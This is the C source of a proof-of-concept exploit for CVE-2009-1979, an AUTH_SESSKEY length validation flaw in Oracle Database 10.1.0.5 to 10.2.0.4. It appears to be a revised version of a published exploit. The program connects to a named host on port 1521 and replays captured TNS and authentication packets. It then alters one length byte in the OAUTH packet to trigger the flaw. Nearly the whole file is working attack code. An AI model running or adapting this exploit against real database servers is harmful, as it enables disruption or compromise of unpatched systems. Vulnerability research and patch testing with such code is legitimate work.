# Title : Oracle Database 10.1.0.5 - 10.2.0.4 AUTH_SESSKEY length validation exploit
# Published : 2009-10-30
# Author : Dennis Yurichev
#include <winsock2.h> /* must precede windows.h */
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <string>
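/* Send all `size` bytes of `msg` on socket `s` and log the outcome on stdout.
 *
 * try_host() puts the socket into non-blocking mode (FIONBIO) before use, so
 * send() may legitimately return a short count or WSAEWOULDBLOCK; the original
 * version only logged a short send and dropped the rest of the packet. This
 * version retries the remainder, waiting up to 1 s for the socket to become
 * writable between attempts. Failures are still only reported, not returned:
 * the interface stays `void` for the existing callers.
 */
void s_send (SOCKET s, char *msg, DWORD size)
{
    DWORD done=0;
    printf ("s_send: begin: %lu bytes\n", (unsigned long)size);
    while (done<size)
    {
        int sent=send (s, msg+done, (int)(size-done), 0);
        if (sent==SOCKET_ERROR)
        {
            int err=WSAGetLastError();
            if (err==WSAEWOULDBLOCK)
            {
                /* Send buffer full on the non-blocking socket: wait for it to
                 * drain, then retry the remainder. */
                struct timeval t;
                fd_set wfd;
                t.tv_sec=1;
                t.tv_usec=0;
                FD_ZERO(&wfd);
                FD_SET(s, &wfd);
                if (select (0, 0, &wfd, 0, &t)>0)
                {
                    continue;
                }
                printf ("send() would block and the socket did not become writable\n");
            }
            else
            {
                printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", err);
            }
            break;
        }
        done+=(DWORD)sent;
    }
    if (done!=size)
    {
        printf ("sent only %lu bytes\n", (unsigned long)done);
    }
    printf ("s_send: end\n");
}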
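/* Wait up to 100 ms for data on `s`, read at most one recv() worth of it
 * (20000 bytes) and log how much arrived.
 *
 * The bytes themselves are discarded: nothing in this PoC parses the server's
 * replies, so a refuse packet (wrong SERVICE_NAME, listener protection) or
 * an error response is not detected and the caller keeps sending. The call
 * mainly serves to pace the conversation and to drain the receive buffer.
 *
 * Unlike the original, a select() failure (SOCKET_ERROR, which is non-zero
 * and therefore used to fall into the recv() branch) is reported separately.
 */
void s_recv (SOCKET s)
{
    char buf[20000];
    int ready;
    int r;
    struct timeval t;
    fd_set fd;
    t.tv_sec=0;
    t.tv_usec=100000; // 100 ms
    printf ("s_recv: begin\n");
    FD_ZERO(&fd);
    FD_SET(s, &fd);
    ready=select (0, &fd, 0, 0, &t);
    if (ready==SOCKET_ERROR)
    {
        printf ("select() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
        return;
    }
    if (ready==0)
    {
        printf ("select() returns zero\n");
        return;
    }
    r=recv (s, buf, (int)sizeof(buf), 0);
    if (r>0)
    {
        printf ("got %d bytes\n", r);
    }
    else
    {
        /* 0 = orderly close by the peer, -1 = socket error. */
        printf ("connection lost, r=%d\n", r);
    }
}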
/* 58-byte TNS connect packet (NSPTCN) header template, kept for reference:
 * s_send_TNS_command() below builds its packet from an identical inline
 * literal instead of reading this array, and nothing else in this listing
 * uses it. Fields the sender patches: bytes 0-1 = total packet length
 * (big-endian), bytes 24-25 = connect-data length (big-endian). Bytes 26-27
 * hold 0x003A = 58, presumably the offset of the connect data inside the
 * packet (it equals NSPTCN_HEADER_LEN). The meaning of the remaining fields
 * cannot be derived from this file. */
unsigned char NSPTCN[]=
{
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
//^^ ^^ cmd len (bytes 24-25, big-endian, patched by the sender)
0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
};
/* sizeof(NSPTCN) */
#define NSPTCN_HEADER_LEN 58
/* 10-byte TNS data packet (NSPTDA) header template used by s_send_NSPTDA():
 * bytes 0-1 are overwritten with the total packet length (big-endian) on
 * every call; byte 4 (0x06) is the packet type. Every hand-built data packet
 * in try_host() begins with these same ten bytes (length filled in). */
unsigned char NSPTDA[]=
{
0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
// ^^ ^^ packet len (bytes 0-1, big-endian, patched by the sender)
0x00, 0x00
};
/* sizeof(NSPTDA) */
#define NSPTDA_HEADER_LEN 10
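/* Prefix `size` bytes of `msg` with a 10-byte TNS data packet (NSPTDA) header
 * and send the result on `s`.
 *
 * Only the total length (bytes 0-1, big-endian) is filled in; as in the
 * original it is written into the shared NSPTDA[] template, so the global is
 * modified as a side effect of every call. Payloads whose total length does
 * not fit the 2-byte field are rejected instead of being sent with a
 * truncated length. Not used by try_host(), which sends data packets whose
 * header is already part of the captured bytes.
 */
void s_send_NSPTDA (SOCKET s, char *msg, int size)
{
    char * buf;
    int sz;
    if (size<0 || size>0xFFFF-NSPTDA_HEADER_LEN)
    {
        printf ("s_send_NSPTDA: payload of %d bytes does not fit a TNS data packet\n", size);
        return;
    }
    sz=size + NSPTDA_HEADER_LEN;
    buf=(char*)malloc (sz);
    if (buf==NULL)
    {
        printf ("s_send_NSPTDA: malloc(%d) failed\n", sz);
        return;
    }
    NSPTDA[0]=(unsigned char)((sz >> 8) & 0xFF);
    NSPTDA[1]=(unsigned char)(sz & 0xFF);
    memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
    memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
    printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
    s_send (s, buf, (DWORD)sz);
    free (buf);
}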
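/* Build a TNS connect packet (NSPTCN) carrying `cmd` as its connect data,
 * e.g. "(DESCRIPTION=(CONNECT_DATA=...)(ADDRESS=...))", and send it on `s`.
 *
 * The 58-byte header is the same template as the NSPTCN[] array above. Two
 * fields are patched in: bytes 0-1 = total packet length (big-endian) and
 * bytes 24-25 = connect-data length (big-endian). Bytes 26-27 stay 0x003A
 * (= 58), presumably the offset of the connect data, which is always
 * appended directly after the header here.
 *
 * Only connect strings shorter than 231 bytes are supported. Longer connect
 * data needs a different packet layout (the original author's note:
 * "something should be modified here in NSPTCN"); such a call is reported
 * and rejected. The original relied on assert(0) alone for this, which in an
 * NDEBUG build would silently send nothing.
 *
 * The header bytes are hex escapes; the published listing had lost the
 * backslashes ("x00x00..."), which would have produced a 4-character string
 * and an out-of-bounds read in the 58-byte memcpy.
 */
void s_send_TNS_command (SOCKET s, const char *cmd)
{
    unsigned char * pkt;
    int cmd_len=strlen (cmd);
    int pkt_len;
    printf ("sending [%s]\n", cmd);
    printf ("len: %d\n", cmd_len);
    if (cmd_len>=231)
    {
        printf ("connect data of %d bytes is too long for this NSPTCN builder (max 230)\n", cmd_len);
        assert (0);
        return;
    }
    pkt_len=cmd_len+58;
    pkt=(unsigned char*)malloc (pkt_len);
    if (pkt==NULL)
    {
        printf ("malloc(%d) failed\n", pkt_len);
        return;
    }
    memcpy (pkt,
        "\x00\x00\x00\x00\x01\x00\x00\x00"
        // plenH, plenL
        "\x01\x3A\x01\x2C\x00\x41\x20\x00"
        "\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
        "\x00\x00\x00\x3A\x00\x00\x02\x00"
        // cmdlenH cmdlenL (bytes 24-25 of the previous line)
        "\x61\x61\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00", 58);
    memcpy (pkt+58, cmd, cmd_len);
    pkt[0]=(unsigned char)((pkt_len>>8)&0xFF);
    pkt[1]=(unsigned char)(pkt_len&0xFF);
    pkt[24]=(unsigned char)((cmd_len>>8)&0xFF);
    pkt[25]=(unsigned char)(cmd_len&0xFF);
    s_send (s, (char*)pkt, (DWORD)pkt_len);
    free (pkt);
}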
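/* Drive one target through the TNS/TTC handshake up to the OAUTH call and
 * send the malformed AUTH_SESSKEY packet (CVE-2009-1979, see main()).
 *
 * h: host name or dotted IPv4 address of the listener; the port is fixed at
 *    1521.
 * Returns true when the connection was established and all packets were
 * handed to send(); false when Winsock could not be initialised or connect()
 * did not complete within 3 s. Server replies are never parsed (see s_recv),
 * so a refused connection -- wrong SERVICE_NAME, listener protection -- is
 * not detected; the packets are sent regardless.
 *
 * Every packet below is a byte-for-byte replay captured from a real client
 * session (user "scott", AUTH_SID "dennis", AUTH_PROGRAM_NM "python.exe",
 * driver "cx_Oracle-4.4"), apart from the single byte patched before the
 * last send. The SERVICE_NAME=orcl and HOST=192.168.0.115 in the connect
 * string come from that capture and have to be adjusted for the target.
 * The replayed AUTH_SESSKEY/AUTH_PASSWORD values cannot be valid for another
 * server; the PoC presumably relies on the length being processed before the
 * key is verified -- not confirmable from this file.
 *
 * The escape sequences below are hex escapes ("\x00"); the published listing
 * had lost the backslashes, which would have turned every packet into a
 * short ASCII string and made the fixed-size memcpy/send calls read past it.
 */
bool try_host (char * h)
{
    struct hostent *hp;
    WSADATA wsaData;
    struct sockaddr_in sin;
    int r;
    struct timeval t;
    fd_set wfd, efd;
    SOCKET s;
    char pkt1318[1318];

    if (WSAStartup(MAKEWORD(1, 1), &wsaData)!=0)
    {
        printf ("WSAStartup() failed\n");
        return false;
    }
    hp=gethostbyname (h);
    assert (hp!=NULL);
    /* The socket is AF_INET: only a 4-byte address may be copied into sin_addr
     * (the original copied h_length bytes unchecked). */
    assert (hp->h_addrtype==AF_INET && hp->h_length==sizeof(sin.sin_addr));
    s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
    assert (s!=INVALID_SOCKET);
    {
        u_long on=1;
        /* Non-blocking, so connect() can be bounded by the 3 s select() below.
         * The call is kept outside assert() so it still runs under NDEBUG. */
        r=ioctlsocket(s, FIONBIO, &on);
        assert (r!=-1);
    }
    memset (&sin, 0, sizeof(sin));
    sin.sin_family=AF_INET;
    sin.sin_port=htons(1521);
    memcpy(&sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
    r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
    if (r==SOCKET_ERROR && WSAGetLastError()!=WSAEWOULDBLOCK)
    {
        /* WSAEWOULDBLOCK is the normal result of a non-blocking connect();
         * anything else is a real failure. */
        printf ("connect() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
        r=closesocket (s);
        assert (r==0);
        WSACleanup ();
        return false;
    }
    t.tv_sec=3;
    t.tv_usec=0;
    FD_ZERO(&wfd);
    FD_SET(s, &wfd);
    FD_ZERO(&efd);
    FD_SET(s, &efd);
    /* Winsock reports a failed non-blocking connect() in the except set, not
     * the write set, so both are watched. */
    r=select (0, 0, &wfd, &efd, &t);
    if (r==SOCKET_ERROR || r==0 || FD_ISSET(s, &efd))
    {
        if (r==0)
        {
            printf ("while connect(): select() returns zero\n");
        }
        else
        {
            printf ("while connect(): connect() failed\n");
        }
        r=closesocket (s);
        assert (r==0);
        WSACleanup ();
        return false;
    }
    printf ("connected to %s\n", h);

    /* NSPTCN (connect). The listener first answers with NSPTRS (resend), so
     * the same connect packet is sent twice; the second one is acknowledged
     * with NSPTAC. */
    s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
    // waiting for NSPTRS
    s_recv(s);
    s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
    // waiting for NSPTAC
    s_recv(s);

    /* From here on every packet is a TNS data packet: the first ten bytes are
     * the NSPTDA header (big-endian length, type 0x06) with the length already
     * filled in. */

    // send NA packet
    s_send (s,
        "\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
        "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
        "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
        "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
        "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
        "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
        "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
        "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
        "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
        "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
        ,156);
    s_recv (s);

    // send TTIPRO (protocol negotiation; carries the client platform string
    // "IBMPC/WIN_NT-8.1.0")
    s_send (s,
        "\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
        "\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
        "\x2E\x31\x2E\x30\x00"
        , 37);
    s_recv (s);

    // send TTIDTY
    s_send (s,
        "\x00\x4B\x00\x00\x06\x00\x00\x00\x00\x00\x02\xB2\x00\xB2\x00\xD2"
        "\x25\x06\x01\x01\x01\x0D\x01\x01\x05\x01\x01\x01\x01\x01\x01\x01"
        "\x7F\xFF\x03\x09\x03\x03\x01\x00\x7F\x01\x1F\xFF\x01\x03\x01\x01"
        "\x3F\x01\x01\x05\x00\x01\x07\x02\x01\x00\x00\x18\x00\x01\x80\x00"
        "\x00\x00\x3C\x3C\x3C\x80\x00\x00\x00\xD0\x07"
        , 75);
    s_recv (s);

    // call OSESSKEY (first authentication round trip for user "scott";
    // the server's reply, which would carry the real session key, is drained
    // and ignored -- the original sent OAUTH without reading it at all)
    s_send (s,
        "\x00\xDA\x00\x00\x06\x00\x00\x00\x00\x00\x03\x76\x02\xFE\xFF\xFF"
        "\xFF\x05\x00\x00\x00\x01\x00\x00\x00\xFE\xFF\xFF\xFF\x05\x00\x00"
        "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0D"
        "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41"
        "\x4C\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F"
        "\x00\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D"
        "\x5F\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65"
        "\x78\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F"
        "\x4D\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B"
        "\x47\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08"
        "\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00"
        "\x09\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00"
        "\x00\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06"
        "\x64\x65\x6E\x6E\x69\x73\x00\x00\x00\x00"
        , 218);
    s_recv (s);

    /* call OAUTH. The key/value list in this packet is laid out as
     *   <4-byte length><1-byte chunk length><key>
     *   <4-byte length><1-byte chunk length><value><4-byte trailer>
     * (inferred from the visible bytes, e.g. \x0C\x00\x00\x00\x0C "AUTH_SESSKEY"
     * followed by \x40\x00\x00\x00\x40 and 64 hex characters). */
    memcpy (pkt1318,
        "\x05\x26\x00\x00\x06\x00\x00\x00\x00\x00\x03\x73\x03\xFE\xFF\xFF"
        "\xFF\x05\x00\x00\x00\x01\x01\x00\x00\xFE\xFF\xFF\xFF\x12\x00\x00"
        "\x00\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF\x05\x73\x63\x6F\x74\x74\x0C"
        "\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x53\x45\x53\x53\x4B\x45\x59"
        "\x40\x00\x00\x00\x40\x36\x33\x41\x45\x31\x36\x41\x30\x44\x31\x41"
        "\x46\x31\x45\x39\x33\x37\x41\x44\x36\x36\x46\x34\x46\x31\x35\x36"
        "\x37\x31\x30\x33\x30\x34\x46\x36\x36\x30\x31\x44\x30\x45\x33\x35"
        "\x34\x37\x46\x42\x46\x39\x35\x34\x39\x37\x34\x32\x33\x30\x42\x43"
        "\x30\x36\x45\x34\x30\x01\x00\x00\x00\x0D\x00\x00\x00\x0D\x41\x55"
        "\x54\x48\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x40\x00\x00\x00\x40"
        "\x36\x31\x37\x35\x31\x42\x45\x35\x34\x37\x31\x30\x44\x45\x41\x46"
        "\x38\x46\x42\x33\x34\x32\x45\x36\x32\x41\x45\x35\x30\x45\x44\x38"
        "\x45\x43\x38\x30\x39\x33\x31\x44\x33\x44\x45\x34\x42\x33\x41\x37"
        "\x34\x35\x38\x37\x45\x36\x46\x32\x36\x46\x37\x45\x45\x30\x34\x34"
        "\x00\x00\x00\x00\x08\x00\x00\x00\x08\x41\x55\x54\x48\x5F\x52\x54"
        "\x54\x05\x00\x00\x00\x05\x32\x38\x30\x32\x38\x00\x00\x00\x00\x0D"
        "\x00\x00\x00\x0D\x41\x55\x54\x48\x5F\x43\x4C\x4E\x54\x5F\x4D\x45"
        "\x4D\x04\x00\x00\x00\x04\x34\x30\x39\x36\x00\x00\x00\x00\x0D\x00"
        "\x00\x00\x0D\x41\x55\x54\x48\x5F\x54\x45\x52\x4D\x49\x4E\x41\x4C"
        "\x05\x00\x00\x00\x05\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x0F\x00"
        "\x00\x00\x0F\x41\x55\x54\x48\x5F\x50\x52\x4F\x47\x52\x41\x4D\x5F"
        "\x4E\x4D\x0A\x00\x00\x00\x0A\x70\x79\x74\x68\x6F\x6E\x2E\x65\x78"
        "\x65\x00\x00\x00\x00\x0C\x00\x00\x00\x0C\x41\x55\x54\x48\x5F\x4D"
        "\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
        "\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
        "\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
        "\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
        "\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
        "\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
        "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
        "\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
        "\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
        "\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
        "\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
        "\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
        "\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
        "\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
        "\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
        "\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
        "\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
        "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
        "\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
        "\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
        "\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
        "\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
        "\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
        "\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
        "\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
        "\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
        "\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
        "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
        "\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
        "\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
        "\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
        "\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
        "\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
        "\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
        "\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
        "\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
        "\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
        "\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
        "\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
        "\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
        "\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
        "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
        "\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
        "\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
        "\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
        "\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
        "\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
        "\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
        "\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
        "\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
        "\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
        "\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
        "\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
        "\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
        "\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
        "\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
        "\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
        "\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
        "\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00"
        ,1318);
    /* The trigger. Offset 0x41 is the second byte of the 4-byte
     * \x40\x00\x00\x00 field that sits between the key "AUTH_SESSKEY" and its
     * 64-character value (presumably the little-endian value length). After
     * the patch that field reads \x40\x80\x00\x00 while the value chunk that
     * follows is still only 64 bytes: the announced length no longer matches
     * the data, which is the length check the server fails to perform (see
     * the page title). */
    pkt1318[0x41]=0x80;
    s_send (s, pkt1318, 1318);
    /* Give the server a moment and drain whatever it sends back before
     * closing: closesocket() with unread data in the receive buffer makes
     * Winsock reset the connection, and a RST can race the packet just sent. */
    s_recv (s);
    r=closesocket (s);
    assert (r==0);
    WSACleanup ();
    return true;
}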
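/* Entry point: `argv[1]` is the target host (listener port 1521 is fixed in
 * try_host). Exit status is 0 when try_host() reports success, 1 on usage
 * error or when the connection could not be established. Declared as
 * `int main` rather than the non-standard `void main`.
 */
int main(int argc, char * argv[])
{
    printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
    printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
    if (argc<2 || argv[1]==NULL)
    {
        printf ("use: %s <hostname>\n", argv[0]);
        return 1;
    }
    return try_host (argv[1]) ? 0 : 1;
}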